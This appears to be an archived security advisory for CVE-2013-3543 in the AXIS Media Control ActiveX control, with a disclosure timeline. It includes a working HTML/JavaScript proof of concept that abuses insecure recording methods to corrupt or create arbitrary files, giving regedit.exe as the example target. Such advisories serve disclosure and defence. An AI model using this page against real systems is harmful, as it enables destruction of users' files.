exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

AXIS Media Control Active-X File Corruption

AXIS Media Control Active-X File Corruption
Posted Jun 13, 2013
Authored by Javier Repiso Sanchez

AXIS Media Control suffers from an ActiveX file corruption vulnerability. The vulnerability exists due to the ActiveX control including insecure "StartRecord()", "SaveCurrentIm age()" and "StartRecordMedia()" methods in "AxisMediaControlEmb.dll" DLL. This can be exploited to corrupt or create arbitrary files in the context of the current user.

tags | exploit, arbitrary, activex
advisories | CVE-2013-3543
SHA-256 | 2c7f0f9dc413f306ab4175eaf1c5a26e6f9f46c26e980683a1c746fe13d1344a

AXIS Media Control Active-X File Corruption

Change Mirror Download
========================================================================
AXIS
====================================================================
========================================================================

1.Advisory Information
Title: AXIS Media Control ActiveX vulnerability
Date Published: 12/06/2013
Date of last updated: 12/06/2013

2.Vulnerability Description
A vulnerability has been found in this devices:
-CVE-2013-3543. Exposed Unsafe ActiveX Method(CWE-618)

3.Affected Products
CVE-2013-3543, all camera devices using AXIS Media Control (AMC) are affected
The vulnerability affects to the latest version of the software (6.2.10.11 which was released on October 19, 2012)

4.PoC
4.1.Exposed Unsafe ActiveX Method - File Corruption.
In the vendor web, you could see that “AXIS Media Control is the recommended method for viewing video images in Microsoft Internet Explorer.”
Vulnerability which can be exploited by remote malicious person to overwrite arbitrary files with garbage data on a vulnerable system.
The vulnerability exists due to the ActiveX control including insecure "StartRecord()", "SaveCurrentImage()" and "StartRecordMedia()" methods in "AxisMediaControlEmb.dll" DLL.
This can be exploited to corrupt or create arbitrary files in the context of the current user.
In the following example we will corrupt regedit.exe using one of ActiveX vulnerable methods:

When we click on one of the buttons, we could see that regedit.exe is overwritten with garbage:

The following code could be used to test the vulnerability:
_____________________________________________________________________________
<html>
<head>
<title></title>
<script language="javaScript" type="text/javascript">
function startRecord(){
var theFile = "FilePath//File_name_to_corrupt_or_create";
MyActiveX.StartRecord(theFile);
}
function saveCurrentImage(){
var theFile = "FilePath//File_name_to_corrupt_or_create";
var theFormat = 1;
MyActiveX.SaveCurrentImage(theFormat, theFile);
}
function startRecordMedia(){
var theFile = "FilePath//File_name_to_corrupt_or_create";
var theFlags = 1;
var theMediaTypes = "default"
MyActiveX.StartRecordMedia(theFile, theFlags, theMediaTypes);
}
</script>
</head>
<body>
<object id=MyActiveX classid="CLSID:{DE625294-70E6-45ED-B895-CFFA13AEB044}" style="width:640;height:480">
<param name="MediaURL" value="http://xx.xx.xx.xx/mjpg/video.mjpg">
<param name="MediaType" value="mjpeg">
<param name="Volume" value="1">
<param name="ShowStatusBar" value="1">
<param name="ShowToolbar" value="1">
<param name="AutoStart" value="1">
<param name="UIMode" value="ptz-relative">
<param name="MediaType" value="mjpeg-unicast">
<param name="StretchToFit" value="0">
< param name ='PTZControlURL' value=http://xx.xx.xx.xx/axis-cgi/com/ptz.cgi>
</object>
<br>
<INPUT TYPE="button" VALUE="StartRecord" ONCLICK="startRecord()">
<INPUT TYPE="button" VALUE="SaveCurrentImage" ONCLICK="saveCurrentImage()">
<INPUT TYPE="button" VALUE="StartRecordMedia" ONCLICK="startRecordMedia()">
</body>
</html>
_____________________________________________________________________________

5.Credits
-CVE-2013-3543 was discovered by Javier Repiso Sánchez.

6.Report Timeline
-2013-05-24: Students team notifies the Axis Customer Support of the vulnerability
-2013-05-24: Axis team asks for a report with technical information.
-2013-05-26: Technical details sent to Axis.
-2013-05-27: Axis team reports to the technical support to analyze the vulnerability.
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close